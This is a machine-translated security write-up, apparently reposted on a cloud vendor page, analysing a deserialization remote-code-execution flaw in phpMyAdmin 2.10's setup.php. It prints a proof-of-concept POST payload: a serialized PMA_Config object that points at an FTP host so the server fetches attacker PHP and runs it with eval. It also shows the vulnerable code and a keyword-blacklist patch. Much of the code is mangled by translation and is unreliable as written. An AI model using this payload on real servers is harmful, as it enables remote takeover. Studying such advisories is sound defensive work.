Directory 1. vulnerability description 2. vulnerability trigger Condition 3. vulnerability impact Scope 4. vulnerability code analysis 5. defense Method 6. attack and Defense thinking 1. the vulnerability description briefly summarizes the vulnerability as follows: 1. "/scripts/setup. php "receives serialized POST data sent by the user. action = lay_navigationeoltype = unixtoken = ec4c4c184a
Directory
1. Vulnerability description 2. Vulnerability trigger conditions 3. Impact Scope 4. Vulnerability code analysis 5. Defense methods 6. Attack and Defense thinking
1. Vulnerability description
The vulnerability is summarized as follows:
1. "/scripts/setup. php "token % 22% 3B % 7D % 7D/* token to dynamically obtain action = lay_navigation & eoltype = unix & token = ec4c4c184adfe4b04aa1ae9b90989fc4 & configuration = a: 1: {I: 0; o: 10: "PMA_Config": 1: {s: 6: "source"; s: 24 :" ftp://10.125.62.62/s.txt ";} */2. "/scripts/setup. php "deserializes" $ _ POST ['configuration. during php deserialization, the program does not effectively and maliciously detect the input raw data. 3. hackers can inject "serialized PMA_Config object" setup in POST data. when php deserializes a "serialized PMA_Config object", it will "reinitialize" the object ", that is, call its construct function _ construct ($ source = null) {$ this-> settings = array (); // functions need to refresh in case of config file changed goes in // PMA_Config: load () $ this-> load ($ source); // other settings, ind Ependant from config file, comes in $ this-> checkSystem (); $ this-> checkIsHttps ();} 4. the constructor of the PMA_Config object will re-introduce the configuration file corresponding to "$ source". This "$ source" is obtained after the object is re-initialized, run eval to register the local variable in the configuration file. function load ($ source = null) {$ this-> loadDefaults (); if (null! ==$ Source) {$ this-> setSource ($ source);} if (! $ This-> checkConfigSource () {return false;} $ cfg = array ();/*** Parses the configuration file */$ old_error_reporting = error_reporting (0 ); // use eval to introduce the external configuration file if (function_exists ('file _ get_contents ') {$ eval_result = eval ('?> '. Trim (file_get_contents ($ this-> getSource ();} else {$ eval_result = eval ('?> '. Trim (implode ("\ n", file ($ this-> getSource ();} error_reporting ($ old_error_reporting); if ($ eval_result = false) {$ this-> error_config_file = true;} else {$ this-> error_config_file = false; $ this-> source_mtime = filemtime ($ this-> getSource ());}...
The final result is that the program code introduces the PHP code of the external file injected by the hacker and runs it using eval, resulting in RCE
Relevant Link:
http://php.net/manual/zh/function.unserialize.phphttp://drops.wooyun.org/papers/596http://drops.wooyun.org/tips/3909http://blog.csdn.net/cnbird2008/article/details/7491216
2. Vulnerability trigger conditions
0x1: POC
Token needs to be dynamically obtained
1. POSThttp: // localhost/phpMyAdmin-2.10.0.2-all-languages/scripts/setup. php2. sources % 22% 3B % 7D % 7D/* if the source is an external text file, the native PHP code a: 1: {I: 0; O: 10: "PMA_Config": 1: {s: 6: "source"; s: 24: "ftp: // 10.125.62.62/s.txt ";}}*/
3. Scope of impact
1. phpmyadmin 2.102. <= phpmyadmin 2.10
4. Vulnerability code analysis
0x1: PHP serialize & unserialize
For more information about security issues related to PHP serialization and deserialization, see another article.
http://www.cnblogs.com/LittleHann/p/4242535.html
0x2: "/scripts/setup. php"
if (isset($_POST['configuration']) && $action != 'clear' ) { // Grab previous configuration, if it should not be cleared $configuration = unserialize($_POST['configuration']);} else { // Start with empty configuration $configuration = array();}
The root cause of the vulnerability is that the program trusts the external data sent by the user and performs local serialization directly, resulting in "Object injection". Hackers inject PMA_Config objects that already exist in the code space, during deserialization, php automatically calls the _ wakeup function of the object. In the _ wakeup function, the $ source parameter passed in externally is used as the source of the configuration file, then, use eval to introduce it to the local code space.
0x3: \ libraries \ Config. class. php
/*** Re-init object after loading from session file * checks config file for changes and relaods if neccessary */function _ wakeup () {// when _ wakeup () is executed, $ source has been registered as an external $ source Parameter if (! $ This-> checkConfigSource () | $ this-> source_mtime! = Filemtime ($ this-> getSource () | $ this-> default_source_mtime! = Filemtime ($ this-> default_source) | $ this-> error_config_file | $ this-> error_config_default_file) {$ this-> settings = array (); $ this-> load (); $ this-> checkSystem ();} // check for https needs to be done everytime, // as https and http uses same session so this info can not be stored // in session $ this-> checkIsHttps (); $ this-> checkCollationConnection (); $ this-> checkFontsize ();}
5. Defense methods
0x1: Apply Patch
If (isset ($ _ POST ['configuration']) & $ action! = 'Clear') {$ configuration = array (); // protocol matching ignores case-insensitive if (strpos ($ _ POST ['configuration'], "PMA_Config ")! = False) & (stripos ($ _ POST ['configuration'], "ftp ://")! = False) | (stripos ($ _ POST ['configuration'], "http ://")! = False) {$ configuration = array ();} else {// Grab previous configuration, if it shoshould not be cleared $ configuration = unserialize ($ _ POST ['configuration']) ;}} else {// Start with empty configuration $ configuration = array ();}
6. Attack and Defense
Copyright (c) 2014 LittleHann All rights reserved
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
